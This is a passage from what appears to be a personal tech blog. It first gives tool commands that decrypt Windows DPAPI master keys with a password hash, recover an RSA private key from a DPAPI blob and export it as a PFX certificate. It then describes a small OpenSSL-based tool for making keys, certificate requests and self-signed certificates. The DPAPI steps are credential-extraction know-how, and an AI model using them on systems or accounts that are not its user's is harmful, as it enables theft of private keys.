3/ Decrypt masterkey’s located in C:\Users\%username%\AppData\Roaming\Microsoft\Protect\%SID%
nthash-win64 /decodemks /binary:c:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001 /password:your-sha1-hash-password /save

->masterkey’s will be saved to masterkeys.ini

4/ Decrypt dpapi blob with masterkey (from masterkeys.ini)
nthash-win64 /decodeblob /binary:d673096e4c9c08d6fc03c64c44117795_e65f292c-6dbf-47f8-b70f-c52e116acc05 /save

->you get a decoded.bin
This is your decrypted DPAPI blob i.e your decrypted rsa (private) key.

5/ Convert the decrypted rsa key to a PEM format

cert.exe –rsa2pem –filename=decoded.bin

->you get a decoded.pem

Note, we could have done it in 2 steps : rsa2pvk and then pvk2pem.

6/ Create a pfx with your certificate and private key

Optionally : you can check that your certificate and private key share the same modulus.

tinyssl –print_private –filename=decoded.pem

tinyssl –print_cert –filename=blob.crt

Finally, create your pfx certificate.

tinyssl –pemtop12 –privatekey=decoded.pem –cert=blob.crt

->you get a cert.pfx, ready to import.

Enjoy!

Fév 252023
 

Still pursuing my journey around ldap, ssl and certificates : lets play with OpenSSL libraries.

Have a look at the code on github here.

Possible actions so far:

--genkey generate rsa keys public.pem and private.pem
--encrypt encrypt a file using public.pem
--decrypt decrypt a file using private.pem
--mkcert make a self sign root cert, read from privatekey (option) & write to ca.crt and ca.key
--mkreq make a certificate service request, read from request.key (if exist) & write to request.csr request.key
--signreq make a certificate from a csr, read from a csr filename and a cert file
--selfsign make a self sign cert, write to cert.crt cert.key
--p12topem convert a pfx to pem, write to cert.crt and cert.key
--pemtop12 convert a pem to pfx, read from cert.crt and cert.key

Example to create a root ca, a certificate signing request and a certificate (which you can use in latest chrome) :

rem if you want to reuse an existing key and therefore renew instead of recreate
tinySSL.exe --mkcert --debug=true --privatekey=ca.key --password=password --filename=ca.crt
rem recreate, not renew
rem tinySSL.exe --mkcert --debug=true --filename=ca.crt
rem renew, not recreate
tinySSL.exe --mkreq --debug=true --filename=request.csr --privatekey=request.key
rem recreate, not renew
rem tinySSL.exe --mkreq --debug=true --filename=request.csr
tinySSL.exe --signreq --debug=true --alt="DNS:*.groupe.fr" --password=password --filename=request.csr --cert=ca.crt

Note : have a look at this article if you want to test your certificate in a http ssl server.